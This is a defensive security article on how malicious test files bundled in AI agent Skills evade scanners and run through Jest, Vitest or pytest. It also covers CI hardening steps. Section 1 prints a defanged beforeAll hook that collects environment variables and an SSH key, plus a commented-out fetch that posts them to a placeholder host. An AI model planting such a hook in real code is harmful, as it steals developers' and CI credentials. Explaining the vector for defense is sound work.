A standard security scan of an Anthropic Skill might return a perfect health report today, even while a malicious payload sits quietly in an adjacent directory waiting for the right moment to strike. This discrepancy arises because current scanning tools focus almost exclusively on the agent’s execution surface, such as the primary markdown instructions and the specific scripts the agent is explicitly told to run. However, a significant vulnerability exists within the files that the scanner ignores, particularly test files like .test.ts or conftest.py. These files are often bundled with the Skill and, upon installation, are automatically picked up by local development tools and continuous integration environments. Because scanners are programmed to look for prompt injections and malicious shell commands within the agent’s direct operational path, they remain entirely blind to code that executes during the testing phase. This oversight creates a dangerous entry point where malicious code can ride in on a file intended for quality assurance, exploiting the trust developers place in automated testing frameworks. The risk is not theoretical; it represents a fundamental mismatch between the threat model being scanned and the actual execution paths present on a modern developer’s machine. As organizations increasingly adopt AI agents to streamline complex workflows, the potential for these unmonitored files to compromise entire development environments grows, necessitating a more comprehensive approach to Skill security that extends beyond the agent’s immediate instructions to the broader toolchain.
1. The Mechanics: Understanding the Test-File Exploit
Testing frameworks like Jest, Vitest, and Mocha have become staples of the modern JavaScript and TypeScript ecosystems, largely due to their ability to simplify test discovery through recursive glob patterns. When a developer installs a new Anthropic Skill using commands like npx skills add, the installer typically places the entire Skill directory into a folder such as .agents/skills/. While security scanners meticulously inspect the SKILL.md file for dangerous prompts, test runners are scouring the entire project for files matching specific extensions. Most default configurations for these frameworks are designed to be helpful, often passing parameters like dot: true to their underlying glob engines to ensure no test is missed, even if it resides within a hidden or dot-prefixed directory. This means that a malicious .test.ts file tucked away inside a Skill’s folder will be treated as a first-class test by the developer’s local environment or the company’s build server. There is no mechanism within current scanner logic to flag these files as dangerous, because they are technically outside the agent’s own runtime. Consequently, the very tools meant to ensure software quality become the delivery mechanism for unauthorized code execution. The recursive nature of these tools ensures that as soon as a Skill is added to a project, any bundled test files are integrated into the active test suite without any manual intervention or explicit approval from the user.
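To make the discovery mechanics concrete, here is a minimal sketch. The Skill name and directory layout are hypothetical, but the testMatch patterns shown are Jest’s documented defaults; Vitest ships comparable include globs.

```js
// Hypothetical project layout after a Skill is installed:
//
//   .agents/skills/report-helper/
//     SKILL.md            <- the only file most scanners inspect
//     scripts/render.py   <- inspected if SKILL.md references it
//     exfil.test.ts       <- ignored by scanners, found by test runners
//
// jest.config.js restating Jest's documented default discovery patterns:
module.exports = {
  testMatch: [
    "**/__tests__/**/*.[jt]s?(x)",
    "**/?(*.)+(spec|test).[jt]s?(x)", // matches exfil.test.ts anywhere
  ],
};
// Because the underlying glob engine runs with dot-directory matching
// enabled, ".agents/skills/report-helper/exfil.test.ts" satisfies the
// second pattern and joins the active suite on the next test run.
```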
Once discovered, the malicious payload does not wait for a prompt from an AI agent to begin its work; instead, it leverages standard testing hooks like beforeAll or beforeEach to fire its code. These hooks are designed to set up environments, but in the hands of an attacker, they serve as a silent trigger that executes before any actual assertions are run. Within this context, the code has full access to the local filesystem, environment variables, and any sensitive keys stored in the environment, such as SSH or AWS credentials. In a continuous integration (CI) pipeline, the stakes are even higher, as these environments often hold deployment tokens and secrets required to access production infrastructure. The vulnerability is further exacerbated by how these Skills are managed within a team; because the .agents/ directory is usually committed to the repository to ensure consistency across the development group, a single malicious Skill can propagate to every teammate who clones the project. This “trust-on-install” model is reminiscent of historical exploits involving npm postinstall scripts, but it is uniquely dangerous here because the code resides in a location that traditional security tools do not expect to harbor executable threats. The payload executes silently, often leaving no trace in the test output that would suggest anything unusual has occurred, while simultaneously exfiltrating sensitive data to an external endpoint controlled by the attacker.
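The trigger itself is small enough to hide in plain sight. Below is a defanged sketch of the pattern described above; the file name, endpoint, and targeted paths are placeholders rather than real indicators of compromise, and the exfiltration call is left commented out. It uses Jest-style globals (beforeAll, it, expect), which Vitest also provides when globals are enabled.

```ts
// exfil.test.ts -- hypothetical, defanged illustration only
import { readFileSync } from "node:fs";
import { homedir } from "node:os";
import { join } from "node:path";

function tryRead(path: string): string | null {
  try { return readFileSync(path, "utf8"); } catch { return null; }
}

beforeAll(async () => {
  // Fires before any assertion, with the full privileges of the
  // developer's shell or the CI job; no agent involvement required.
  const loot = {
    env: process.env, // CI deployment tokens, AWS keys, etc.
    ssh: tryRead(join(homedir(), ".ssh", "id_ed25519")), // placeholder path
  };
  // A live payload would ship `loot` to an attacker-controlled endpoint:
  // await fetch("https://collector.invalid/upload", {
  //   method: "POST",
  //   body: JSON.stringify(loot),
  // });
  void loot; // defanged: nothing leaves the machine in this sketch
});

it("passes and looks like routine housekeeping", () => {
  expect(1 + 1).toBe(2);
});
```

Because the hook succeeds and the lone assertion passes, the suite reports green and the run is indistinguishable from an ordinary test.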
2. The Evidence: Analyzing Major Security Audits and Findings
Recent investigations by security firms have shed light on the massive scale of this problem, starting with Gecko Security’s detailed disclosure of the attack flow. Their research demonstrated that the gap is not a failure of individual scanners to function as intended, but rather a structural blind spot common to the entire category of AI agent security tools. This qualitative finding was reinforced by the SkillScan academic study, which performed a quantitative analysis of 31,132 unique Anthropic Skills collected from popular marketplaces. The study’s results were sobering, revealing that 26.1% of the analyzed Skills contained at least one vulnerability, ranging from data exfiltration to privilege escalation. Perhaps more importantly, the researchers found that Skills bundling executable scripts were over twice as likely to contain security flaws compared to those that were instruction-only. This statistic highlights a clear correlation between the complexity of a Skill’s file structure and its likelihood of being malicious or poorly secured. The study effectively mapped the execution surface that scanners currently inspect, providing a baseline that highlights exactly what is being missed. While scanners are getting better at identifying obvious prompt injections, the sheer volume of Skills with hidden executable logic suggests that the current manual and automated review processes are failing to keep pace with the creativity of threat actors.
Building on these findings, the Snyk ToxicSkills audit provided further evidence of the ongoing threat by scanning nearly 4,000 Skills and identifying critical issues in over 13% of them. This audit was particularly notable for discovering 76 confirmed malicious payloads, some of which remained publicly available even after the research was published. While companies like Cisco have stepped in to provide integrated solutions, such as the AI Agent Security Scanner for IDEs, these tools still predominantly target the agent interaction layer. Cisco’s scanner brings valuable capabilities to developers’ workflows by scanning for risks in real time within environments like VS Code and Cursor, yet it does not currently inspect bundled test files. This is because the detection categories were built to answer the question “what will the agent do,” rather than “what will the developer’s tools do with the Skill’s files.” The distinction is critical: even with the most advanced scanners currently on the market, a developer remains vulnerable to the test-file execution vector. The three major scanners (Snyk, Cisco, and VirusTotal Code Insight) are all proficient at catching prompt-based attacks, but they share the same structural limitation of ignoring the developer execution surface that sits right next to the agent’s code. This collective oversight has created a false sense of security for organizations that believe a “clean” scan result implies a safe Skill.
3. Practical Implementation: Three Steps to Fortify Your CI Pipeline
To mitigate these risks immediately, organizations must take proactive steps to harden their development and CI environments without waiting for scanner vendors to update their logic. The first and most effective defense is to explicitly configure test runners to ignore the directories where AI Skills are stored. For teams using Jest, this involves adding a specific regex to the testPathIgnorePatterns in the configuration file, while Vitest users should update their exclude array to include the .agents/ path. This single line of configuration prevents the test runner from ever discovering or executing malicious files hidden within those directories. Beyond this, a secondary layer of defense should be implemented in the form of a pre-merge CI check. This check should be designed to scan the .agents/skills/ directory for any files that match common test or configuration patterns, such as *.test.*, *.spec.*, or conftest.py. Since these files have no legitimate purpose inside a Skill directory intended for agent use, their presence should be treated as a high-risk indicator. A simple shell script can be used to flag and block pull requests containing these files, forcing a manual review before any potentially malicious code can enter the main codebase. By shifting the focus from the content of the files to their mere existence in sensitive locations, security teams can close the execution window that attackers rely on.
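Hedged sketches of both defenses follow, assuming the .agents/ layout described above. testPathIgnorePatterns and the test.exclude array are the documented Jest and Vitest options; configDefaults is Vitest’s exported set of default excludes.

```js
// jest.config.js -- entries are regexes matched against full test paths
module.exports = {
  testPathIgnorePatterns: [
    "/node_modules/", // Jest's default, restated so it is not lost
    "/\\.agents/",    // never discover tests inside installed Skills
  ],
};
```

```ts
// vitest.config.ts -- append the Skill directory to the default excludes
import { configDefaults, defineConfig } from "vitest/config";

export default defineConfig({
  test: {
    exclude: [...configDefaults.exclude, "**/.agents/**"],
  },
});
```

The pre-merge guard can be as simple as the script below, which assumes it runs from the repository root; extend the -name patterns to match your team’s conventions.

```bash
#!/usr/bin/env bash
# Fail the build if anything under .agents/skills/ looks like a test
# or test-framework configuration file.
set -euo pipefail

matches=$(find .agents/skills -type f \
  \( -name '*.test.*' -o -name '*.spec.*' -o -name 'conftest.py' \) \
  2>/dev/null || true)

if [ -n "$matches" ]; then
  echo "Blocked: test-like files found inside Skill directories:" >&2
  echo "$matches" >&2
  exit 1
fi
```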
The third essential step in securing the Skill supply chain is to move away from the “trust-on-first-use” model by pinning all Skill dependencies to immutable commit hashes. The standard installation commands often pull the latest version of a Skill from a repository, which creates an opening for an attacker to push a malicious update to a Skill that was previously audited and cleared. By specifying a specific commit hash, developers ensure that they are only running code that has been reviewed and verified by their internal security protocols. This practice aligns with the recommendations found in the OWASP Agentic Skills Top 10, which emphasizes the need for version control and integrity checks in AI-driven workflows. When an update to a Skill is required, the team should perform a diff between the current and new versions to identify any new files or changes in logic that could introduce vulnerabilities. This approach transforms the installation process from a passive acceptance of third-party code into a rigorous verification cycle. Furthermore, for repositories where Skills have already been installed, it is vital to run an immediate audit using static analysis tools to identify any existing test files that may have been overlooked. If suspicious files are discovered, the incident response should include rotating any credentials that were accessible to the CI environment and reviewing logs for unauthorized network activity. Taking these steps ensures that even if a scanner fails to catch a threat, the environment is architected to prevent its execution.
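A minimal sketch of the pin-and-diff workflow, assuming Skills are vendored directly from git; the repository URL, Skill name, and AUDITED_SHA variable are placeholders.

```bash
# Vendor the Skill at a specific, reviewed commit rather than tracking HEAD.
git clone https://github.com/example-org/report-helper-skill \
  .agents/skills/report-helper
git -C .agents/skills/report-helper checkout "$AUDITED_SHA"

# When an update is proposed, review exactly what changed before re-pinning:
git -C .agents/skills/report-helper fetch origin
git -C .agents/skills/report-helper diff --stat "$AUDITED_SHA"..origin/main

# Pay particular attention to files added since the last audit:
git -C .agents/skills/report-helper diff --diff-filter=A --name-only \
  "$AUDITED_SHA"..origin/main
```

Pinning this way means an upstream push changes nothing locally until a human re-runs the diff, reviews it, and deliberately moves the pin.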
4. Vendor Evaluation: Five Essential Questions for Skill Scanners
As the market for AI agent security tools matures, procurement teams must look beyond marketing claims and ask difficult questions about the underlying detection logic of their chosen scanners. A primary concern is the actual depth of analysis; it is no longer enough for a scanner to only look at the SKILL.md file. Security professionals should ask vendors exactly which files and directories are included in their analysis and whether they treat non-instructional files as potential execution surfaces. If a scanner only focuses on the agent’s intent, it will inevitably miss kinetic actions triggered by the developer’s toolchain. It is also important to determine if the tool can recognize the specific risks associated with bundled test files or build configurations. Given that studies have shown script-bundling Skills are significantly more likely to be vulnerable, the scanner should ideally flag these as higher-risk entries during the initial review. Understanding the vendor’s stance on the developer execution surface is crucial for determining if their product fits into a modern, defense-in-depth strategy. Vendors should be able to explain how their tool accounts for the ways in which modern testing frameworks interact with installed dependencies. This level of inquiry pushes vendors to move toward a more holistic threat model that considers the entire lifecycle of a Skill, from installation to execution, rather than just the moment the agent is invoked.
Transparency is another key metric for evaluating scanner effectiveness, and organizations should favor vendors that publish their detection categories or open-source their scanning logic. For instance, Cisco’s decision to open-source its Skill Scanner allows security teams to verify exactly what threats are being checked, providing a level of assurance that closed-source tools cannot match. When engaging with a vendor, ask if they have published any ecosystem-scale audits that detail their research methodology and sample sizes. Large-scale audits, like those conducted by Snyk or the authors of SkillScan, provide a benchmark for understanding the actual threat landscape and the vendor’s ability to navigate it. Without a published audit, it is difficult to independently verify a scanner’s detection rate or its performance against real-world malicious payloads. Additionally, ask if the vendor provides specific documentation or integration guides for hardening CI pipelines, such as instructions for restricting test-runner discovery patterns. A vendor who understands the systemic nature of these vulnerabilities will provide more than just a scanning tool; they will offer the guidance necessary to integrate that tool into a secure development environment. Finally, inquire about how the scanner handles the evolution of threats, such as the emergence of new testing frameworks or changes in how AI IDEs handle Skill directories. A tool that cannot adapt to the changing developer toolchain will quickly become obsolete as attackers find new execution vectors outside the traditional boundaries.
5. Strategic Shifts: Expanding the Modern Threat Model
The shift toward AI agents represents an explosion of non-human identities within the enterprise, many of which operate with elevated privileges and access to previously siloed data sets. As these agents become more integrated into daily operations, the distinction between “intent” and “kinetic action” becomes paramount for security strategy. Current Anthropic Skill scanners are largely designed to solve the problem of intent: what is the Skill telling the agent to do? While this is a critical component of security, the Gecko bypass proves that focusing solely on intent leaves a wide opening for kinetic actions that occur entirely outside the agent’s awareness. These actions leverage the permissions of the developer or the CI system, which are often far more extensive than the permissions granted to the agent itself. To build a resilient security posture, organizations must bridge this gap by treating the developer toolchain as a first-class citizen in their threat models. This means recognizing that any file added to a repository is a potential execution vector, regardless of whether it is intended for the AI agent or for the testing suite. The focus must expand from protecting the agent’s prompts to protecting the integrity of the entire environment in which the agent resides. This broader perspective ensures that security controls are placed where the code actually executes, rather than just at the perimeter of the agent’s instructions.
The discovery of the test-file vulnerability highlights a critical need for organizations to look beyond the immediate operational surface of AI agents. It is not enough to rely on scanners that focus solely on the instructions provided to the agent, because the threat resides in the very tools used to maintain code quality. By implementing specific exclusions in test runners and enforcing strict pre-merge audits, teams can close the execution window that attackers have exploited. The transition from a trust-based model to a verification-heavy approach, built on immutable commit pinning and manual code reviews, is essential to securing the supply chain. These actions do more than patch a single flaw; they establish a new standard for how third-party AI Skills are integrated into secure environments. They also reinforce the idea that as developer tools and AI agents continue to converge, the boundaries of security must expand to cover the entire toolchain. Organizations that move quickly to harden their CI pipelines and challenge their security vendors for greater transparency will be better positioned to weather the evolving threat landscape. In the end, the solution requires a combination of technical configuration changes and a fundamental shift in how security teams perceive the risks associated with AI-driven development.
